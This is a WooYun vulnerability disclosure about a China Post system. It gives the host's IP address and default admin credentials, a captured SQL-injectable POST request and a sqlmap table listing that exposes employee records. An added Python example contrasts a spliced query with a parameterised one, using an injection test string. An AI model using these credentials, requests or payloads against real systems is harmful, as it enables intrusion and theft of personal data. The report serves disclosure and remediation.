
Vulnerability Summary

Defect ID: wooyun-2016-0187847

Title: Weak password and SQL injection in a China Post system, exposing information on more than 800,000 employees

Vendor: China Post Group Corporation Information Technology Bureau (中国邮政集团公司信息技术局)

Author: wps2015

Submitted: 2016-03-23 07:47

Fixed: 2016-05-07 08:19

Published: 2016-05-07 08:19

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2016-03-23: Details sent to the vendor, awaiting vendor handling
2016-03-23: Vendor confirmed; details disclosed to the vendor only
2016-04-02: Details disclosed to core white hats and relevant domain experts
2016-04-12: Details disclosed to regular white hats
2016-04-22: Details disclosed to intern white hats
2016-05-07: Details disclosed to the public

Summary:

Weak password to get into the system + SQL injection

Details:

Affected site: http://211.156.198.57
Weak credentials: ADMIN 888888

[Screenshot: 1.png]


Under Collection Management -> Collection Resources -> Vehicle Maintenance, the license plate number and vehicle type fields are vulnerable to SQL injection.

[Screenshot: 2.png]


POST /clgl/clxxbAction_querypage.action HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=utf-8
X-Requested-With: XMLHttpRequest
_eosAjax: xml
encoding: utf-8
Referer: http://211.156.198.57/jsp/yzznzd/clgl/clgl_cx.jsp
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: 211.156.198.57
Content-Length: 516
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=xsSdwaOjxEzsIBECirXu1KTyGjTF1ujWibO8ulKxCnlLQyrySC5e!1358030613
submitType=2&ajax=<?xml version="1.0" encoding="utf-8"?><root><params><param><key>orgcode</key><value></value></param><param><key>orgcodeOthers</key><value></value></param><param><key>vXjjgbz</key><value>0</value></param><param><key>vCph</key><value>2*</value></param><param><key>vClzt</key><value></value></param><param><key>vCx</key><value>3</value></param></params>
<data><criteria><_entity></_entity></criteria><page><begin>0</begin><length>10</length><count>-1</count><isCount>true</isCount></page></data></root>


Fed the captured query request into sqlmap: 24 databases.

[Screenshot: 3.png]


Current database:

Database: YZZNZD
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| ZNZD_T_DEV | 22836726 |
| ZNZD_T_PDADLB | 16248560 |
| ZHW_T_LOG | 15144408 |
| ZNZD_T_LTYGPSB | 2771925 |
| TX_T_CSXXB | 1656479 |
| AC_OPERATORROLE_BACK | 1453543 |
| YZTD_T_YJXXB | 1337742 |
| AC_OPERATORROLE | 1081814 |
| ZJ_T_ZFCS | 1073134 |
| OM_EMPORG | 929456 |
| ZNZD_T_ZDBBXXB | 921485 |
| ZJ_T_DZYHXX | 896119 |
| OM_EMPLOYEE | 852420 |
| AC_OPERATOR | 851572 |
| ZJ_T_DZYHZDJG | 725500 |
| ZJ_T_DZYHZDJG_BAK | 705840 |
| TX_T_CSWJDJB | 617281 |
| ZNZD_T_ERRLOG | 530825 |
| ZNZD_T_GXTYSJGB | 379680 |
| ZNZD_T_CONFIG | 215879 |
| ZNZD_T_SBXXB | 209276 |
| T_SYS_LOGINLOG | 181842 |
| ZNZD_T_PDAXTB | 152364 |
| YZTD_T_ZQWDJGB | 143809 |
| YZTD_T_ZQWDJGB_0812 | 136225 |
| ZHW_T_JGLSGXB | 135240 |
| TX_T_JSWJXXB | 129743 |
| OM_ORGANIZATION_20141014 | 124473 |
| OM_ORGANIZATION | 102608 |
| YZTD_T_ZQWDJGB_TMP | 98695 |
| OM_ORGANIZATION_BACK | 93550 |
| ZJ_T_ZFZTCS | 83168 |
| TNP_T_YYJGB | 61068 |
| YZTD_T_ZQWDJGB_1216 | 54853 |
| ABF_T_YGFJXXB | 37931 |
| TNP_T_TDJGB | 31757 |
| YZTD_T_JGQHYB | 26843 |
| ZNZD_T_SBXXB_BAK | 18574 |
| YZTD_T_TDJGXZQHDZB | 17579 |
| ZHW_T_YGB_HBBAK | 14799 |
| OM_EMPGROUP | 12308 |
| ZNZD_T_YGUPDATE | 7553 |
| ABF_T_ZZJGGXSB | 4508 |
| ABF_T_JGFJXXB | 4175 |
| ZNZD_T_GGFBJGDYB | 4108 |
| SYS_EXPORT_SCHEMA_04 | 3526 |
| SYS_EXPORT_SCHEMA_03 | 3514 |
| ZNZD_T_GGHFRYDYB | 3479 |
| SYS_EXPORT_SCHEMA_02 | 3400 |
| SYS_EXPORT_SCHEMA_01 | 3394 |
| TAB_BOROUGH | 3177 |
| TAB_ORGAN | 2774 |
| ZJ_T_QHYB | 2621 |
| ZJ_T_GNDM | 2480 |
| ZNZD_T_GGFBJSDYB | 1972 |
| ZHW_T_JGB_HBBAK | 1604 |
| ZNZD_T_TDJGB | 1604 |
| YZTD_T_PBB | 1334 |
| OM_PARTYROLE | 1186 |
| ZNZD_T_LOG | 1011 |
| TAB_CHYZBM | 949 |
| OM_GROUPRANGE | 898 |
| OM_GROUP | 796 |
| ABF_T_RYKGLJG | 774 |
| ZNZD_T_GGXXB | 759 |
| AC_ROLEFUNC | 659 |
| ZJ_T_ZFZTCS_BAK | 590 |
| ZHW_T_YGB | 563 |
| ZNZD_T_JKPZB | 534 |
| OM_EMPPOSITION | 526 |
| AC_OPERATOR_JT | 507 |
| AC_OPERATORROLE_JT | 507 |
| OM_EMPLOYEE_JT | 507 |
| OM_EMPORG_JT | 507 |
| ZNZD_T_GXTYSJGB_JT | 507 |
| YZTD_T_ZQWDJGB_WUHAN | 449 |
| ZJ_T_YWCP | 364 |
| EOS_DICT_ENTRY | 345 |
| TAB_CITY | 343 |
| TAB_T_JKPZB | 323 |
| YZTD_T_PBJHB | 254 |
| ABF_T_DBSYB | 198 |
| ZNZD_T_ZQJGYHYSB | 174 |
| ZNZD_T_BBJGDYB | 157 |
| EOS_UNIQUE_TABLE | 142 |
| ZNZD_T_PLQYRYB | 127 |
| ABF_T_EDUCATION | 122 |
| EOS_DICT_TYPE | 112 |
| ZNZD_T_PLQYGPSB | 107 |
| ZNZD_T_DDJBXXB | 96 |
| AC_FUNCGROUP | 95 |
| AC_FUNCTION | 93 |
| ABF_T_RYKGLJG_BAK | 84 |
| ZNZD_T_LSRWCBB | 81 |
| ZNZD_T_ZDBBSJB | 78 |
| PDA_T_JSQXB | 72 |
| ZNZD_T_KHXLZXB | 71 |
| EOS_DICT_ENTRY_I18N | 68 |
| PDA_T_FUNC | 67 |
| ZNZD_T_CLXXB | 59 |
| ZHW_T_JGB | 51 |
| ZHW_T_JGB_JT | 51 |
| ZNZD_T_DLXXB | 42 |
| ZNZD_T_DEFCONF_DEF | 41 |
| ZNZD_T_PLQYB | 38 |
| ZNZD_T_KHTSXXB | 33 |
| ZNZD_T_PLXLB | 32 |
| TAB_PROVINCE | 31 |
| ZNZD_T_SJYJYHB | 30 |
| AC_APPLICATION | 29 |
| ZNZD_T_PLXLAPB | 28 |
| ZNZD_T_KHXX | 21 |
| ZNZD_T_YWCPB | 19 |
| TX_T_CSPZB | 18 |
| ZNZD_T_PLYWHZB | 17 |
| EOS_DICT_TYPE_I18N | 16 |
| ZHXX_T_TSXXB | 16 |
| ZNZD_T_KHXXB | 15 |
| ZNZD_T_PBJHXX | 13 |
| ZNZD_T_PLPBXXB | 13 |
| ZNZD_T_WXYHXXB | 13 |
| TAB_USERMAP | 12 |
| ZNZD_T_CSXXB | 12 |
| ZNZD_T_SYSPAGE | 12 |
| PDA_T_UJS | 11 |
| AC_ROLE | 10 |
| PDA_T_UMAP | 10 |
| OM_EMPLOYEE_SJLS | 9 |
| PDA_T_ROLE | 8 |
| PDA_T_USER | 8 |
| O_ORG | 7 |
| ABF_T_GGB | 6 |
| TAB_INTERFACE | 6 |
| TAB_USER | 6 |
| EOS_QRTZ_LOCKS | 5 |
| TAB_T_DICTION | 4 |
| ABF_T_ZZJGSB | 3 |
| OM_POSITION | 3 |
| ZHXX_T_VERSION | 3 |
| ZNZD_T_DEFCONF | 2 |
| ABF_T_JGFJZDXXDMB | 1 |
| EOS_QRTZ_FIRED_TRIGGERS | 1 |
| EOS_QRTZ_SIMPLE_TRIGGERS | 1 |
| TAB_TERMINAL | 1 |
| TDGJ_T_VERSION | 1 |
| ZNZD_T_DBSYB | 1 |
| ZNZD_T_DBYSB | 1 |
+--------------------------+---------+


OM_EMPLOYEE 852420

[Screenshot: 4.png]


AC_OPERATOR 851572

[Screenshot: 5.png]


Proof of vulnerability:

[Screenshot: 5.png]

Fix:

Filtering
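As an added illustration of the fix (example code, not from the report or the vendor's system): a vehicle lookup of the kind behind the request above with the vCph / vCx fields spliced into the SQL, beside a parameterised version and the allowlist check the "filtering" advice amounts to. Python with sqlite3; ZNZD_T_CLXXB is a table name from the dump, while the column names and sample rows are constructed assumptions.

```python
import re
import sqlite3

# Constructed sample rows (not from the report) standing in for the vehicle
# table behind clxxbAction_querypage.action. ZNZD_T_CLXXB is a table name
# taken from the dump; the columns CPH, CX and ORGCODE are assumptions.
SAMPLE_ROWS = [
    ("京A12345", "3", "ORG01"),
    ("京B67890", "3", "ORG02"),
    ("沪C00001", "1", "ORG03"),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ZNZD_T_CLXXB (CPH TEXT, CX TEXT, ORGCODE TEXT)")
    conn.executemany("INSERT INTO ZNZD_T_CLXXB VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn

def query_vehicles_vulnerable(conn, v_cph, v_cx):
    # The defect the report describes: the request fields vCph / vCx are
    # spliced into the SQL text, so a quote in either rewrites the WHERE clause.
    sql = ("SELECT CPH, CX, ORGCODE FROM ZNZD_T_CLXXB "
           f"WHERE CPH LIKE '{v_cph}%' AND CX = '{v_cx}'")
    return conn.execute(sql).fetchall()

def query_vehicles_safe(conn, v_cph, v_cx):
    # Hardened form: both values are bound as parameters, so the database
    # treats them as data and never parses them as SQL.
    sql = ("SELECT CPH, CX, ORGCODE FROM ZNZD_T_CLXXB "
           "WHERE CPH LIKE ? AND CX = ?")
    return conn.execute(sql, (v_cph + "%", v_cx)).fetchall()

def plate_prefix_ok(v_cph):
    # Allowlist check for the "filtering" the fix suggests: a plate-number
    # prefix is CJK characters, upper-case letters and digits, up to 8 long.
    # Quotes, spaces and LIKE wildcards (% _) all fail this check.
    return re.fullmatch(r"[\u4e00-\u9fa5A-Z0-9]{0,8}", v_cph) is not None

if __name__ == "__main__":
    db = make_db()
    bad_plate = "x' OR '1'='1' --"       # constructed test input
    print(len(query_vehicles_vulnerable(db, bad_plate, "3")))  # 3: every row
    print(query_vehicles_safe(db, bad_plate, "3"))             # []
    print(plate_prefix_ok("京A"), plate_prefix_ok(bad_plate))  # True False
```

Parameter binding is the fix that closes the injection; the allowlist check is defence in depth and also keeps LIKE wildcards out of the prefix search.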

Copyright notice: when reposting, please credit the source wps2015@乌云 (WooYun)


Vendor Response

Vendor response:

Severity: Medium

Rank: 8

Confirmed: 2016-03-23 08:19

Vendor reply:

Thanks.

Latest status:

None yet